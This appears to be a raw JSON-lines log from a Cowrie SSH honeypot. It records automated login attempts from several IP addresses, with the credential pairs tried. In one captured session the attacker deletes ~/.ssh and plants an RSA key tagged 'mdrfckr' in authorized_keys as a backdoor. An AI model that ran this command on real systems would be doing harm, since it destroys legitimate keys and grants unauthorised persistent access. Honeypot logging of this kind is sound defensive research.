{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:52:16.897780Z","src_ip":"103.100.209.195","session":"0c7a4c1ee6d8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:52:17.102000Z","src_ip":"103.100.209.195","session":"0c7a4c1ee6d8"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":42564,"dst_ip":"1.2.3.4","dst_port":22,"session":"50affa699585","protocol":"ssh","message":"New connection: 152.32.129.236:42564 (1.2.3.4:22) [session: 50affa699585]","sensor":"my-vps","timestamp":"2025-09-09T00:52:17.175534Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:52:17.176701Z","src_ip":"152.32.129.236","session":"50affa699585"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:52:17.900996Z","src_ip":"103.100.209.195","session":"0c7a4c1ee6d8"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:52:18.101422Z","src_ip":"103.100.209.195","session":"dbe86208d8f4"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:52:18.102469Z","src_ip":"103.100.209.195","session":"0c7a4c1ee6d8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:52:18.174557Z","src_ip":"152.32.129.236","session":"50affa699585"}
{"eventid":"cowrie.login.failed","username":"hammer","password":"qwerty","message":"login attempt [hammer/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T00:52:20.071264Z","src_ip":"152.32.129.236","session":"50affa699585"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:52:21.338368Z","src_ip":"152.32.129.236","session":"50affa699585"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":57814,"dst_ip":"1.2.3.4","dst_port":22,"session":"adf08e9e6738","protocol":"ssh","message":"New connection: 43.156.132.147:57814 (1.2.3.4:22) [session: adf08e9e6738]","sensor":"my-vps","timestamp":"2025-09-09T00:52:32.611738Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:52:32.614110Z","src_ip":"43.156.132.147","session":"adf08e9e6738"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64838,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d4c227a8fe7","protocol":"ssh","message":"New connection: 217.72.205.35:64838 (1.2.3.4:22) [session: 1d4c227a8fe7]","sensor":"my-vps","timestamp":"2025-09-09T00:52:32.697536Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:52:32.698762Z","src_ip":"217.72.205.35","session":"1d4c227a8fe7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:52:32.876296Z","src_ip":"43.156.132.147","session":"adf08e9e6738"}
{"eventid":"cowrie.login.failed","username":"dennis","password":"dennis","message":"login attempt [dennis/dennis] failed","sensor":"my-vps","timestamp":"2025-09-09T00:52:33.997978Z","src_ip":"43.156.132.147","session":"adf08e9e6738"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:52:35.263080Z","src_ip":"43.156.132.147","session":"adf08e9e6738"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":40944,"dst_ip":"1.2.3.4","dst_port":22,"session":"a03a32208108","protocol":"ssh","message":"New connection: 5.202.105.236:40944 (1.2.3.4:22) [session: a03a32208108]","sensor":"my-vps","timestamp":"2025-09-09T00:53:22.698409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:53:22.714062Z","src_ip":"5.202.105.236","session":"a03a32208108"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":48762,"dst_ip":"1.2.3.4","dst_port":22,"session":"d83273f5f21f","protocol":"ssh","message":"New connection: 103.100.209.195:48762 (1.2.3.4:22) [session: d83273f5f21f]","sensor":"my-vps","timestamp":"2025-09-09T00:53:22.793744Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:53:22.802494Z","src_ip":"103.100.209.195","session":"d83273f5f21f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:53:22.867068Z","src_ip":"5.202.105.236","session":"a03a32208108"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:53:22.999715Z","src_ip":"103.100.209.195","session":"d83273f5f21f"}
{"eventid":"cowrie.login.failed","username":"z","password":"12345678","message":"login attempt [z/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T00:53:23.436465Z","src_ip":"5.202.105.236","session":"a03a32208108"}
{"eventid":"cowrie.login.failed","username":"black","password":"qwerty","message":"login attempt [black/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T00:53:23.790518Z","src_ip":"103.100.209.195","session":"d83273f5f21f"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:53:24.570707Z","src_ip":"5.202.105.236","session":"a03a32208108"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:53:24.990513Z","src_ip":"103.100.209.195","session":"d83273f5f21f"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":53254,"dst_ip":"1.2.3.4","dst_port":22,"session":"0368d710ff6e","protocol":"ssh","message":"New connection: 51.250.72.176:53254 (1.2.3.4:22) [session: 0368d710ff6e]","sensor":"my-vps","timestamp":"2025-09-09T00:53:32.394328Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:53:32.395293Z","src_ip":"51.250.72.176","session":"0368d710ff6e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:53:32.427179Z","src_ip":"51.250.72.176","session":"0368d710ff6e"}
{"eventid":"cowrie.login.failed","username":"lsfadmin","password":"lsfadmin@2025","message":"login attempt [lsfadmin/lsfadmin@2025] failed","sensor":"my-vps","timestamp":"2025-09-09T00:53:32.598783Z","src_ip":"51.250.72.176","session":"0368d710ff6e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:53:33.633391Z","src_ip":"51.250.72.176","session":"0368d710ff6e"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":56858,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd5e49f56f9c","protocol":"ssh","message":"New connection: 152.32.129.236:56858 (1.2.3.4:22) [session: dd5e49f56f9c]","sensor":"my-vps","timestamp":"2025-09-09T00:53:41.999262Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:53:42.000150Z","src_ip":"152.32.129.236","session":"dd5e49f56f9c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:53:42.998680Z","src_ip":"152.32.129.236","session":"dd5e49f56f9c"}
{"eventid":"cowrie.login.success","username":"root","password":"Ky123456.","message":"login attempt [root/Ky123456.] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:53:44.063004Z","src_ip":"152.32.129.236","session":"dd5e49f56f9c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:53:44.596475Z","src_ip":"152.32.129.236","session":"dd5e49f56f9c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:53:44.597202Z","src_ip":"152.32.129.236","session":"dd5e49f56f9c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:53:44.598209Z","src_ip":"152.32.129.236","session":"dd5e49f56f9c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:53:44.855785Z","src_ip":"152.32.129.236","session":"dd5e49f56f9c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:53:45.486014Z","src_ip":"152.32.129.236","session":"dd5e49f56f9c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:53:45.487031Z","src_ip":"152.32.129.236","session":"dd5e49f56f9c"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":43966,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2a63b1673b3","protocol":"ssh","message":"New connection: 43.156.132.147:43966 (1.2.3.4:22) [session: b2a63b1673b3]","sensor":"my-vps","timestamp":"2025-09-09T00:53:45.612785Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:53:45.613438Z","src_ip":"43.156.132.147","session":"b2a63b1673b3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:53:45.746480Z","src_ip":"152.32.129.236","session":"dd5e49f56f9c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:53:45.747699Z","src_ip":"152.32.129.236","session":"dd5e49f56f9c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:53:45.857670Z","src_ip":"43.156.132.147","session":"b2a63b1673b3"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":36938,"dst_ip":"1.2.3.4","dst_port":22,"session":"ced93130ba38","protocol":"ssh","message":"New connection: 152.32.129.236:36938 (1.2.3.4:22) [session: ced93130ba38]","sensor":"my-vps","timestamp":"2025-09-09T00:53:46.000428Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:53:46.001830Z","src_ip":"152.32.129.236","session":"ced93130ba38"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:53:46.256573Z","src_ip":"152.32.129.236","session":"ced93130ba38"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@12345","message":"login attempt [root/Admin@12345] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:53:46.874753Z","src_ip":"43.156.132.147","session":"b2a63b1673b3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:53:47.316191Z","src_ip":"152.32.129.236","session":"ced93130ba38"}
